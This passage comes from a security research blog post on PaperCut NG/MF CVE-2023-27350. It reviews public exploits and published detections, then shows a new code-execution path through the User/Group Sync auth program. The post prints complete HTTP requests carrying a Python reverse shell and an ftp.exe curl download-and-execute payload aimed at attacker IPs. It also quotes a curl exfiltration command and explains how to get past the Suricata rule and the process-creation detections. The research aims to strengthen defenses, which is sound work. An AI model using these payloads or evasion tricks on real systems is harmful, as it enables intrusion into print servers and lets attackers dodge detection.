authentication bypass was assigned CVE-2023-27350. The CVEs were published by ZDI, more than a month after they published their own advisories.\"},{\"date\":\"April 21, 2023\",\"markdown\":\"Huntress Labs published a blog detailing exploitation in the wild. CISA added CVE-2023-27350 to the CISA KEV list. Public exploits demonstrating the bypass appeared on [GitHub](https:\u002F\u002Fraw.githubusercontent.com\u002FTamingSariMY\u002FCVE-2023-27350-POC\u002Fmain\u002Fvuln.py).\"},{\"date\":\"April 24, 2023\",\"markdown\":\"Horizon3.ai [published](https:\u002F\u002Fwww.horizon3.ai\u002Fpapercut-cve-2023-27350-deep-dive-and-indicators-of-compromise\u002F) an exploit that demonstrated the bypass *and* executed arbitrary code.\"},{\"date\":\"April 26, 2023\",\"markdown\":\"Microsoft attributes attacks in mid-April to [TA505](https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fta505).\"}]",[61,98776,84831],{"id":84830},[18,98778,98779],{},"At the time of writing, two public exploit variants use CVE-2023-27350 and execute arbitrary code on PaperCut NG and MF:",[1789,98781,98782,98785],{},[25,98783,98784],{},"Exploits that use the PaperCut print scripting interface to execute Windows commands (variations on the Horizon3.ai exploit).",[25,98786,98787,98788,27987],{},"Exploits that use the print scripting interface to drop a malicious JAR (see this Metasploit ",[47,98789,98792],{"href":98790,"rel":98791},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework",[51],"pull request",[18,98794,98795,98796,98801],{},"In both cases, the attacker abuses the system’s built-in JavaScript interface. The JavaScript engine is ",[47,98797,98800],{"href":98798,"rel":98799},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FRhino_(JavaScript_engine)",[51],"Rhino",", which also allows that user to execute arbitrary Java. PaperCut Software implemented configuration options to lessen the risk of this arbitrary code execution vector, but since the attacker has full administrative access, those protections are easily disabled.",[18,98803,98804,98805,98807,98808,4606],{},"Horizon3.ai’s exploit uses the scripting interface to execute a single Windows command (",[886,98806,22876],{},") and sends the response back to the attacker via ",[886,98809,1557],{},[1354,98811,98813],{"className":27194,"code":98812,"language":27196,"meta":219,"style":219},"java.lang.Runtime.getRuntime().exec('cmd.exe \u002FC \\\"for \u002FF \\\"usebackq delims=\\\" %A in (`whoami`) do curl http:\u002F\u002F10.0.40.83:8081\u002F%A\\\"');\n",[886,98814,98815],{"__ignoreMap":219},[1373,98816,98817,98819,98821,98824,98826,98828,98830,98832,98834,98836,98838,98840,98843,98845,98848,98850,98853,98855,98858,98860,98862],{"class":1375,"line":1376},[1373,98818,27196],{"class":4640},[1373,98820,59],{"class":1383},[1373,98822,98823],{"class":4640},"lang",[1373,98825,59],{"class":1383},[1373,98827,91363],{"class":4640},[1373,98829,59],{"class":1383},[1373,98831,27896],{"class":7297},[1373,98833,16355],{"class":1383},[1373,98835,27901],{"class":7297},[1373,98837,1384],{"class":1383},[1373,98839,1388],{"class":1387},[1373,98841,98842],{"class":1391},"cmd.exe \u002FC ",[1373,98844,17131],{"class":2326},[1373,98846,98847],{"class":1391},"for \u002FF ",[1373,98849,17131],{"class":2326},[1373,98851,98852],{"class":1391},"usebackq delims=",[1373,98854,17131],{"class":2326},[1373,98856,98857],{"class":1391}," %A in (`whoami`) do curl http:\u002F\u002F10.0.40.83:8081\u002F%A",[1373,98859,17131],{"class":2326},[1373,98861,1388],{"class":1387},[1373,98863,4680],{"class":1383},[18,98865,98866],{},"Perhaps the main reason they didn’t establish a reverse shell is because the scripting engine has a five second timeout (see decompiled code below). The attacker cannot maintain execution in the engine itself; they have to migrate to another process.",[18,98868,98869],{},[68,98870],{":width":10862,"alt":98871,"src":98872},"decompiled papercut jar","\u002Fblog\u002Fpapercut-rce\u002Frhino-timeout.png",[18,98874,98875,98876,98879,98880,98883],{},"The previously mentioned Metasploit module is interesting. It doesn’t use ",[886,98877,98878],{},"java.Runtime.getRuntime().exec()",". Instead, it uses ",[886,98881,98882],{},"java.net.URLClassLoader"," to load a remote Java class. The loaded class will eventually drop a Meterpreter JAR to disk and execute it.",[18,98885,98886,98887,98889],{},"The Java-focused exploitation is useful because PaperCut NG and MF support Linux, Mac, ",[1131,98888,297],{}," Windows. A Windows-only only attack is restricted to… only Windows victims. This approach treats all victims equally.",[18,98891,98892,98893,98895],{},"Unfortunately, while it sounds good on paper, the Metasploit attack is not great. The Meterpreter jar is more or less unobfuscated and well-known to be immediately flagged by Windows Defender (among other AV). As soon as it touches the disk, it’ll be removed. On Linux, where there is less likely to be any AV\u002FEDR, the payload screams that it's malicious. The phrase “metasploit.Payload” literally appears in ",[886,98894,55448],{}," output.",[1354,98897,98899],{"className":31740,"code":98898,"language":2186,"meta":219,"style":219},"papercut 40671 \u002Fhome\u002Fpapercut\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fjava -classpath \u002Ftmp\u002F~spawn8498983783261235927.tmp.dir metasploit.Payload\npapercut 40689 \\_ sh -c \u002Fbin\u002Fsh\npapercut 40690 \\_ \u002Fbin\u002Fsh\n",[886,98900,98901,98921,98937],{"__ignoreMap":219},[1373,98902,98903,98906,98909,98912,98915,98918],{"class":1375,"line":1376},[1373,98904,98905],{"class":2206},"papercut",[1373,98907,98908],{"class":5467}," 40671",[1373,98910,98911],{"class":1391}," \u002Fhome\u002Fpapercut\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fjava",[1373,98913,98914],{"class":2209}," -classpath",[1373,98916,98917],{"class":1391}," \u002Ftmp\u002F~spawn8498983783261235927.tmp.dir",[1373,98919,98920],{"class":1391}," metasploit.Payload\n",[1373,98922,98923,98925,98928,98930,98932,98934],{"class":1375,"line":220},[1373,98924,98905],{"class":2206},[1373,98926,98927],{"class":5467}," 40689",[1373,98929,79157],{"class":2326},[1373,98931,2236],{"class":1391},[1373,98933,45587],{"class":2209},[1373,98935,98936],{"class":1391}," \u002Fbin\u002Fsh\n",[1373,98938,98939,98941,98944,98947],{"class":1375,"line":1266},[1373,98940,98905],{"class":2206},[1373,98942,98943],{"class":5467}," 40690",[1373,98945,98946],{"class":2326}," \\_",[1373,98948,98936],{"class":1391},[18,98950,98951],{},"Either way, both approaches trigger detections that’ve been shared among the security community, so let’s look at those more closely.",[61,98953,98955],{"id":98954},"existing-detections","Existing Detections",[18,98957,98958],{},"There have been three types of detections published so far.",[1789,98960,98961,98964,98967],{},[25,98962,98963],{},"Detection via Sysmon (e.g. process creation analysis).",[25,98965,98966],{},"Detection via log file analysis.",[25,98968,98969],{},"Network signatures.",[993,98971,98973],{"id":98972},"sysmon-detections","Sysmon Detections",[18,98975,98976,98977,982,98981,98986],{},"The Sysmon (or sysmon-esque) detections have been offered up by ",[47,98978,20074],{"href":98979,"rel":98980},"https:\u002F\u002Fgithub.com\u002Fhuntresslabs\u002Fthreat-intel\u002Fblob\u002Fmain\u002F2023\u002F2023-04\u002F20-PaperCut\u002Fwin_susp_papercut_code_execution.yml",[51],[47,98982,98985],{"href":98983,"rel":98984},"https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2023\u002F04\u002F27\u002Fincreased-exploitation-of-papercut-drawing-blood-around-the-internet\u002F",[51],"Sophos",". Both essentially boil down to this:",[1925,98988,98989],{},[18,98990,98991,98992,98995,98996,1554,98998,99001],{},"If ",[886,98993,98994],{},"pc-app.exe"," creates a child process called ",[886,98997,14509],{},[886,98999,99000],{},"powershell.exe"," then an attacker is exploiting PaperCut NG\u002FMF.",[18,99003,99004,99005,99008,99009,13573,99011,99013,99014,27987],{},"This is not unreasonable logic. It’s just insufficient. Already we’ve seen a PaperCut exploit that ",[295,99006,99007],{},"doesn’t"," wouldn’t trigger this detection. Below is Meterpreter being started by ",[886,99010,98994],{},[886,99012,82664],{}," (note the “spawn” logic in the ",[47,99015,99018],{"href":99016,"rel":99017},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-javapayload\u002Fblob\u002Fdee9809f78a7e86981a8f39e0622f05458c85940\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L82",[51],"Java Meterpreter",[18,99020,99021],{},[68,99022],{":width":10862,"alt":99023,"src":99024},"meterpreter jar spawned on windows","\u002Fblog\u002Fpapercut-rce\u002Fspawned-meterpreter.png",[18,99026,99027,99028,99033],{},"There are a whole slew of well-documented ",[47,99029,99032],{"href":99030,"rel":99031},"https:\u002F\u002Flolbas-project.github.io\u002F",[51],"LOLBAS"," an attacker can abuse that would allow them to bypass these detections (as we’ll see later).",[993,99035,99037],{"id":99036},"log-file-detections","Log File Detections",[18,99039,99040],{},"Attacking PaperCut NG and MF via the print scripting interfaces leaves very distinctive entries in the server’s log file. Horizon3.ai noted variations of these entries as good indicators of compromise:",[1354,99042,99045],{"className":99043,"code":99044,"language":1359},[1357],"User \"admin\" logged into the administration interface.\nUser \"admin\" updated the config key “print.script.sandboxed”\nUser \"admin\" updated the config key “device.script.sandboxed”\nAdmin user \"admin\" modified the print script on printer\n",[886,99046,99044],{"__ignoreMap":219},[18,99048,99049],{},"The first entry is generated by CVE-2023-27350 directly. But it's also generated by a normal admin user logging in. Alone, it doesn’t indicate a compromise. The other three entries are all associated with attacking the scripting interface(s). An attacker that doesn’t abuse this functionality won’t generate this particular log entries.",[61,99051,99053],{"id":99052},"network-signatures","Network Signatures",[18,99055,99056],{},"Proof Point’s Open Emerging Threats contains signatures to detect the authentication bypass on the wire. The Suricata rule, modified for brevity, looks like so:",[1354,99058,99060],{"className":31740,"code":99059,"language":2186,"meta":219,"style":219},"alert http any any -> $HOME_NET any ( \\\n msg:\"ET EXPLOIT PaperCut MF\u002FNG SetupCompleted Authentication Bypass (CVE-2023-27350)\"; \\\n flow:established,to_server; \\\n http.method; content:\"GET\"; \\\n http.uri; content:\"\u002Fapp?service=page\u002FSetupCompleted\"; bsize:32; fast_pattern; \\\n reference:cve,2023-27350; \\\n classtype:attempted-admin; \\\n sid:2045130; rev:1;)\n",[886,99061,99062,99090,99106,99115,99132,99158,99167,99176],{"__ignoreMap":219},[1373,99063,99064,99067,99069,99072,99074,99076,99078,99081,99084,99087],{"class":1375,"line":1376},[1373,99065,99066],{"class":2206},"alert",[1373,99068,19100],{"class":1391},[1373,99070,99071],{"class":1391}," any",[1373,99073,99071],{"class":1391},[1373,99075,27425],{"class":4640},[1373,99077,5384],{"class":1397},[1373,99079,99080],{"class":4640}," $HOME_NET ",[1373,99082,99083],{"class":1391},"any",[1373,99085,99086],{"class":4640}," ( ",[1373,99088,99089],{"class":2326},"\\\n",[1373,99091,99092,99095,99097,99100,99102,99104],{"class":1375,"line":220},[1373,99093,99094],{"class":1391}," msg:",[1373,99096,183],{"class":1387},[1373,99098,99099],{"class":1391},"ET EXPLOIT PaperCut MF\u002FNG SetupCompleted Authentication Bypass (CVE-2023-27350)",[1373,99101,183],{"class":1387},[1373,99103,39663],{"class":1383},[1373,99105,76033],{"class":2326},[1373,99107,99108,99111,99113],{"class":1375,"line":1266},[1373,99109,99110],{"class":2206}," flow:established,to_server",[1373,99112,39663],{"class":1383},[1373,99114,76033],{"class":2326},[1373,99116,99117,99120,99122,99125,99128,99130],{"class":1375,"line":1852},[1373,99118,99119],{"class":2206}," http.method",[1373,99121,39663],{"class":1383},[1373,99123,99124],{"class":2206}," content:",[1373,99126,99127],{"class":2206},"\"GET\"",[1373,99129,39663],{"class":1383},[1373,99131,76033],{"class":2326},[1373,99133,99134,99137,99139,99141,99144,99146,99149,99151,99154,99156],{"class":1375,"line":4692},[1373,99135,99136],{"class":2206}," http.uri",[1373,99138,39663],{"class":1383},[1373,99140,99124],{"class":2206},[1373,99142,99143],{"class":2206},"\"\u002Fapp?service=page\u002FSetupCompleted\"",[1373,99145,39663],{"class":1383},[1373,99147,99148],{"class":2206}," bsize:32",[1373,99150,39663],{"class":1383},[1373,99152,99153],{"class":2206}," fast_pattern",[1373,99155,39663],{"class":1383},[1373,99157,76033],{"class":2326},[1373,99159,99160,99163,99165],{"class":1375,"line":4724},[1373,99161,99162],{"class":2206}," reference:cve,2023-27350",[1373,99164,39663],{"class":1383},[1373,99166,76033],{"class":2326},[1373,99168,99169,99172,99174],{"class":1375,"line":4756},[1373,99170,99171],{"class":2206}," classtype:attempted-admin",[1373,99173,39663],{"class":1383},[1373,99175,76033],{"class":2326},[1373,99177,99178,99181,99183,99186,99188],{"class":1375,"line":4768},[1373,99179,99180],{"class":2206}," sid:2045130",[1373,99182,39663],{"class":1383},[1373,99184,99185],{"class":2206}," rev:1",[1373,99187,39663],{"class":1383},[1373,99189,11875],{"class":4640},[18,99191,99192,99193,99195],{},"The rule focuses on detecting the exploitation of the vulnerability itself, and ",[1131,99194,6881],{}," the post-authentication activity, which is likely smart. That’s a very smart approach, and it would detect the previously mentioned exploits.",[18,99197,99198,99199,1554,99202,99205],{},"However, an attacker interested in doing so can trivially bypass this signature (by using ",[886,99200,99201],{},"page\u002F\u002FSetupCompleted",[886,99203,99204],{},"random=1&page\u002FSetupCompleted",", etc.).",[1920,99207,99209],{"id":99208},"a-new-path-to-exploitation","A New Path to Exploitation",[18,99211,99212],{},"As an attacker, if you know a variety of detections will flag your nefarious activities you'll obviously do whatever it takes to bypass those detections. In the case of PaperCut NG and MF, however, all the attacker really needs to do is find a new path to code execution. A new path will prevent the bad log entries from being written, and then the attacker can use whatever LOLBAS bypass the process creation detections.",[18,99214,99215],{},"There are a few places the attacker can pivot to, but let’s look at how an attacker can abuse the PaperCut NG “User\u002FGroup Sync” logic. This interface allows the administrative user to specify a “Custom Program” to source and authenticate users.",[18,99217,99218],{},[68,99219],{":width":10862,"alt":99220,"src":99221},"PaperCut NG User\u002FGroup Sync","\u002Fblog\u002Fpapercut-rce\u002Fusergroupsync.png",[18,99223,99224],{},"The user\u002Fauth programs can be any program on disk. That sounds great (for an attacker), but there are two caveats:",[1789,99226,99227,99230],{},[25,99228,99229],{},"The programs are initially executed without any attacker-controlled parameters.",[25,99231,99232,99233,27987],{},"The auth program has to be interactive (e.g. the username and password are passed via ",[886,99234,87517],{},[18,99236,99237],{},"That is restrictive, but we’ve developed proof-of-concept exploits for both Linux and Windows:",[1789,99239,99240,99246],{},[25,99241,99242,99243,59],{},"On Linux, set the auth program to ",[886,99244,99245],{},"\u002Fusr\u002Fsbin\u002Fpython3",[25,99247,99248,99249,59],{},"On Windows, set the auth program to ",[886,99250,99251],{},"C:\\Windows\\System32\\ftp.exe",[18,99253,99254],{},[68,99255],{":width":10862,"alt":99256,"src":99257},"Python3 as Auth Program","\u002Fblog\u002Fpapercut-rce\u002Fpython3authprogram.png",[18,99259,99260,99261,99264],{},"To execute arbitrary code, the attacker just needs to provide a malicious username and password during a login attempt. For example, on Linux we provide a typical Python reverse shell in the ",[886,99262,99263],{},"inputPassword"," parameter.",[1354,99266,99268],{"className":31740,"code":99267,"language":2186,"meta":219,"style":219},"POST \u002Fapp HTTP\u002F1.1\nHost: 10.9.49.222:9191\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\nContent-Length: 406\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: JSESSIONID=node01s8zloj765g3lirbwnppvw1qo279.node0\nOrigin: http:\u002F\u002F10.9.49.222:9191\u002F\nReferer: http:\u002F\u002F10.9.49.222:9191\u002Fapp\nAccept-Encoding: gzip\nservice=direct\u002F1\u002FHome\u002F$Form&sp=S0&$Submit$0=Log+in&inputUsername=help&inputPassword=import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.49.194\",1270));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\u002Fbin\u002Fsh\")&Form0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$Hidden$0=true&$Hidden$1=X&$PropertySelection=en\n",[886,99269,99270,99279,99287,99329,99337,99344,99352,99360,99368,99376],{"__ignoreMap":219},[1373,99271,99272,99274,99277],{"class":1375,"line":1376},[1373,99273,6946],{"class":2206},[1373,99275,99276],{"class":1391}," \u002Fapp",[1373,99278,35589],{"class":1391},[1373,99280,99281,99284],{"class":1375,"line":220},[1373,99282,99283],{"class":2206},"Host:",[1373,99285,99286],{"class":1391}," 10.9.49.222:9191\n",[1373,99288,99289,99292,99295,99298,99301,99304,99306,99309,99311,99314,99317,99320,99323,99326],{"class":1375,"line":1266},[1373,99290,99291],{"class":2206},"User-Agent:",[1373,99293,99294],{"class":1391}," Mozilla\u002F5.0",[1373,99296,99297],{"class":4640}," (Windows ",[1373,99299,99300],{"class":1391},"NT",[1373,99302,99303],{"class":5467}," 10.0",[1373,99305,39663],{"class":1383},[1373,99307,99308],{"class":2206}," Win64",[1373,99310,39663],{"class":1383},[1373,99312,99313],{"class":2206}," x64",[1373,99315,99316],{"class":4640},") AppleWebKit\u002F537.36 (",[1373,99318,99319],{"class":2206},"KHTML,",[1373,99321,99322],{"class":1391}," like",[1373,99324,99325],{"class":1391}," Gecko",[1373,99327,99328],{"class":4640},") Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\n",[1373,99330,99331,99334],{"class":1375,"line":1852},[1373,99332,99333],{"class":2206},"Content-Length:",[1373,99335,99336],{"class":5467}," 406\n",[1373,99338,99339,99342],{"class":1375,"line":4692},[1373,99340,99341],{"class":2206},"Content-Type:",[1373,99343,7185],{"class":1391},[1373,99345,99346,99349],{"class":1375,"line":4724},[1373,99347,99348],{"class":2206},"Cookie:",[1373,99350,99351],{"class":1391}," JSESSIONID=node01s8zloj765g3lirbwnppvw1qo279.node0\n",[1373,99353,99354,99357],{"class":1375,"line":4756},[1373,99355,99356],{"class":2206},"Origin:",[1373,99358,99359],{"class":1391}," http:\u002F\u002F10.9.49.222:9191\u002F\n",[1373,99361,99362,99365],{"class":1375,"line":4768},[1373,99363,99364],{"class":2206},"Referer:",[1373,99366,99367],{"class":1391}," http:\u002F\u002F10.9.49.222:9191\u002Fapp\n",[1373,99369,99370,99373],{"class":1375,"line":4792},[1373,99371,99372],{"class":2206},"Accept-Encoding:",[1373,99374,99375],{"class":1391}," gzip\n",[1373,99377,99378,99381,99383,99386,99389,99391,99394,99396,99399,99401,99404,99407,99410,99412,99415,99417,99419,99421,99423,99425,99427,99430,99432,99434,99436,99439,99441,99444,99446,99449,99452,99455,99457,99459,99462],{"class":1375,"line":4798},[1373,99379,99380],{"class":4640},"service",[1373,99382,5417],{"class":1397},[1373,99384,99385],{"class":1391},"direct\u002F1\u002FHome\u002F",[1373,99387,99388],{"class":4640},"$Form",[1373,99390,7218],{"class":1383},[1373,99392,99393],{"class":4640},"sp",[1373,99395,5417],{"class":1397},[1373,99397,99398],{"class":1391},"S0",[1373,99400,7218],{"class":1383},[1373,99402,99403],{"class":4640},"$Submit",[1373,99405,99406],{"class":19096},"$0",[1373,99408,99409],{"class":4640},"=Log+in",[1373,99411,7218],{"class":1383},[1373,99413,99414],{"class":4640},"inputUsername",[1373,99416,5417],{"class":1397},[1373,99418,39134],{"class":1391},[1373,99420,7218],{"class":1383},[1373,99422,99263],{"class":4640},[1373,99424,5417],{"class":1397},[1373,99426,19043],{"class":1391},[1373,99428,99429],{"class":2206}," socket,os,pty",[1373,99431,39663],{"class":1383},[1373,99433,94930],{"class":4640},[1373,99435,5417],{"class":1397},[1373,99437,99438],{"class":1391},"socket.socket",[1373,99440,1384],{"class":1383},[1373,99442,99443],{"class":2206},"socket.AF_INET,socket.SOCK_STREAM",[1373,99445,2344],{"class":1383},[1373,99447,99448],{"class":2206},"s.connect((",[1373,99450,99451],{"class":2206},"\"10.9.49.194\"",[1373,99453,99454],{"class":2206},",1270",[1373,99456,27548],{"class":4640},[1373,99458,39663],{"class":1383},[1373,99460,99461],{"class":2206},"os.dup2(s.fileno(",[1373,99463,99464],{"class":4640},"),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\u002Fbin\u002Fsh\")&Form0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$Hidden$0=true&$Hidden$1=X&$PropertySelection=en\n",[18,99466,2245,99467,99469],{},[886,99468,55448],{}," output is still suspicious, but at least the name of a famously malicious pentesting framework appear:",[1354,99471,99473],{"className":31740,"code":99472,"language":2186,"meta":219,"style":219},"papercut 17572 \\_ \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor.conf wrapper.syslog.ident=paperc\npapercut 17574 \\_ ..\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fpc-app -Djava.io.tmpdir=tmp -Dserver.home=. -Xverify:none -XX:+UseParallelOldGC -server -Dpc-reserv\npapercut 43227 \\_ \u002Fusr\u002Fbin\u002Fpython3\npapercut 43232 \\_ \u002Fbin\u002Fsh\n",[886,99474,99475,99493,99524,99536],{"__ignoreMap":219},[1373,99476,99477,99479,99482,99484,99487,99490],{"class":1375,"line":1376},[1373,99478,98905],{"class":2206},[1373,99480,99481],{"class":5467}," 17572",[1373,99483,79157],{"class":2326},[1373,99485,99486],{"class":1391}," \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor",[1373,99488,99489],{"class":1391}," \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor.conf",[1373,99491,99492],{"class":1391}," wrapper.syslog.ident=paperc\n",[1373,99494,99495,99497,99500,99503,99506,99509,99512,99515,99518,99521],{"class":1375,"line":220},[1373,99496,98905],{"class":2206},[1373,99498,99499],{"class":5467}," 17574",[1373,99501,99502],{"class":2326}," \\_",[1373,99504,99505],{"class":1391}," ..\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fpc-app",[1373,99507,99508],{"class":2209}," -Djava.io.tmpdir=tmp",[1373,99510,99511],{"class":2209}," -Dserver.home=.",[1373,99513,99514],{"class":2209}," -Xverify:none",[1373,99516,99517],{"class":2209}," -XX:+UseParallelOldGC",[1373,99519,99520],{"class":2209}," -server",[1373,99522,99523],{"class":2209}," -Dpc-reserv\n",[1373,99525,99526,99528,99531,99533],{"class":1375,"line":1266},[1373,99527,98905],{"class":2206},[1373,99529,99530],{"class":5467}," 43227",[1373,99532,98946],{"class":2326},[1373,99534,99535],{"class":1391}," \u002Fusr\u002Fbin\u002Fpython3\n",[1373,99537,99538,99540,99543,99546],{"class":1375,"line":1852},[1373,99539,98905],{"class":2206},[1373,99541,99542],{"class":5467}," 43232",[1373,99544,99545],{"class":2326}," \\_",[1373,99547,98936],{"class":1391},[18,99549,99550,99551,99553,99554,99556,99557,99559],{},"On the Windows side of things, we’ve chosen ",[886,99552,83469],{}," as our authentication program. ",[886,99555,83469],{}," will execute arbitrary commands if they are prepended with a bang (",[886,99558,16090],{},"). On the wire, that looks like this:",[1354,99561,99563],{"className":31740,"code":99562,"language":2186,"meta":219,"style":219},"POST \u002Fapp HTTP\u002F1.1\nHost: 10.9.49.195:9191\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\nContent-Length: 360\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: JSESSIONID=node012xt0dzcjh0dy5wz7uvh9m26f23.node0\nOrigin: http:\u002F\u002F10.9.49.195:9191\u002F\nReferer: http:\u002F\u002F10.9.49.195:9191\u002Fapp\nAccept-Encoding: gzip\nForm0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$PropertySelection=en&inputUsername=dir&service=direct\u002F1\u002FHome\u002F$Form&sp=S0&$Hidden$0=true&$Hidden$1=X&$Submit$0=Log+in&inputPassword=!curl -s -A Mozilla\u002F5.0 -o C:\\ProgramData\\AXtJxdUwlfJl.exe http:\u002F\u002F10.9.49.194:8080\u002FAXtJxdUwlfJl %26 C:\\ProgramData\\AXtJxdUwlfJl.exe 10.9.49.194 1270\n",[886,99564,99565,99573,99580,99610,99617,99623,99630,99637,99644,99650],{"__ignoreMap":219},[1373,99566,99567,99569,99571],{"class":1375,"line":1376},[1373,99568,6946],{"class":2206},[1373,99570,99276],{"class":1391},[1373,99572,35589],{"class":1391},[1373,99574,99575,99577],{"class":1375,"line":220},[1373,99576,99283],{"class":2206},[1373,99578,99579],{"class":1391}," 10.9.49.195:9191\n",[1373,99581,99582,99584,99586,99588,99590,99592,99594,99596,99598,99600,99602,99604,99606,99608],{"class":1375,"line":1266},[1373,99583,99291],{"class":2206},[1373,99585,99294],{"class":1391},[1373,99587,99297],{"class":4640},[1373,99589,99300],{"class":1391},[1373,99591,99303],{"class":5467},[1373,99593,39663],{"class":1383},[1373,99595,99308],{"class":2206},[1373,99597,39663],{"class":1383},[1373,99599,99313],{"class":2206},[1373,99601,99316],{"class":4640},[1373,99603,99319],{"class":2206},[1373,99605,99322],{"class":1391},[1373,99607,99325],{"class":1391},[1373,99609,99328],{"class":4640},[1373,99611,99612,99614],{"class":1375,"line":1852},[1373,99613,99333],{"class":2206},[1373,99615,99616],{"class":5467}," 360\n",[1373,99618,99619,99621],{"class":1375,"line":4692},[1373,99620,99341],{"class":2206},[1373,99622,7185],{"class":1391},[1373,99624,99625,99627],{"class":1375,"line":4724},[1373,99626,99348],{"class":2206},[1373,99628,99629],{"class":1391}," JSESSIONID=node012xt0dzcjh0dy5wz7uvh9m26f23.node0\n",[1373,99631,99632,99634],{"class":1375,"line":4756},[1373,99633,99356],{"class":2206},[1373,99635,99636],{"class":1391}," http:\u002F\u002F10.9.49.195:9191\u002F\n",[1373,99638,99639,99641],{"class":1375,"line":4768},[1373,99640,99364],{"class":2206},[1373,99642,99643],{"class":1391}," http:\u002F\u002F10.9.49.195:9191\u002Fapp\n",[1373,99645,99646,99648],{"class":1375,"line":4792},[1373,99647,99372],{"class":2206},[1373,99649,99375],{"class":1391},[1373,99651,99652,99655,99657,99660,99662,99664,99666,99669,99672,99674,99676,99678,99681,99683,99686,99688,99690,99692,99695,99697,99699,99701,99703,99705,99707,99709,99711,99713,99715,99717,99719,99722,99724,99726,99728,99731,99733,99735,99737,99739,99741,99743,99745,99748,99750,99753,99755,99757,99760,99763,99766,99768,99771,99774,99777,99779,99781,99783,99785,99787,99790],{"class":1375,"line":4798},[1373,99653,99654],{"class":4640},"Form0",[1373,99656,5417],{"class":1397},[1373,99658,99659],{"class":4640},"$Hidden",[1373,99661,99406],{"class":19096},[1373,99663,5437],{"class":1391},[1373,99665,99659],{"class":4640},[1373,99667,99668],{"class":19096},"$1",[1373,99670,99671],{"class":1391},",inputUsername,inputPassword,",[1373,99673,99403],{"class":4640},[1373,99675,99406],{"class":19096},[1373,99677,5437],{"class":1391},[1373,99679,99680],{"class":4640},"$PropertySelection",[1373,99682,7218],{"class":1383},[1373,99684,99685],{"class":4640},"$PropertySelection=en",[1373,99687,7218],{"class":1383},[1373,99689,99414],{"class":4640},[1373,99691,5417],{"class":1397},[1373,99693,99694],{"class":1391},"dir",[1373,99696,7218],{"class":1383},[1373,99698,99380],{"class":4640},[1373,99700,5417],{"class":1397},[1373,99702,99385],{"class":1391},[1373,99704,99388],{"class":4640},[1373,99706,7218],{"class":1383},[1373,99708,99393],{"class":4640},[1373,99710,5417],{"class":1397},[1373,99712,99398],{"class":1391},[1373,99714,7218],{"class":1383},[1373,99716,99659],{"class":4640},[1373,99718,99406],{"class":19096},[1373,99720,99721],{"class":4640},"=true",[1373,99723,7218],{"class":1383},[1373,99725,99659],{"class":4640},[1373,99727,99668],{"class":19096},[1373,99729,99730],{"class":4640},"=X",[1373,99732,7218],{"class":1383},[1373,99734,99403],{"class":4640},[1373,99736,99406],{"class":19096},[1373,99738,99409],{"class":4640},[1373,99740,7218],{"class":1383},[1373,99742,99263],{"class":4640},[1373,99744,5417],{"class":1397},[1373,99746,99747],{"class":1391},"!curl",[1373,99749,2239],{"class":2206},[1373,99751,99752],{"class":2209}," -A",[1373,99754,99294],{"class":1391},[1373,99756,39692],{"class":2209},[1373,99758,99759],{"class":1391}," C:",[1373,99761,99762],{"class":2326},"\\P",[1373,99764,99765],{"class":1391},"rogramData",[1373,99767,74616],{"class":2326},[1373,99769,99770],{"class":1391},"XtJxdUwlfJl.exe",[1373,99772,99773],{"class":1391}," http:\u002F\u002F10.9.49.194:8080\u002FAXtJxdUwlfJl",[1373,99775,99776],{"class":1391}," %26",[1373,99778,99759],{"class":1391},[1373,99780,99762],{"class":2326},[1373,99782,99765],{"class":1391},[1373,99784,74616],{"class":2326},[1373,99786,99770],{"class":1391},[1373,99788,99789],{"class":5467}," 10.9.49.194",[1373,99791,38925],{"class":5467},[18,99793,99794,99795,99797,99798,99801,99802,99804,99805,99807,99808,99810,99811,99810,99813,99810,99815,59],{},"The attack we’ve chosen is really quite basic. The ",[886,99796,99263],{}," contains logic to download a binary to ",[886,99799,99800],{},"C:\\ProgramData\\"," and execute it. In our case, this binary is a custom reverse shell (written in Go). The result is that ",[886,99803,14509],{}," is never a direct child of ",[886,99806,98994],{},". The process tree is: ",[886,99809,98994],{}," -> ",[886,99812,83469],{},[886,99814,14509],{},[886,99816,99817],{},"AXtJxdUwlfJI.exe",[18,99819,99820],{},[68,99821],{":width":10862,"alt":99822,"src":99823},"Process creation events","\u002Fblog\u002Fpapercut-rce\u002Fftpspawnscmd.png",[18,99825,99826],{},"The process tree, quite obviously, demonstrates poor tradecraft, but it’s sufficient to work around the published process-creation-based 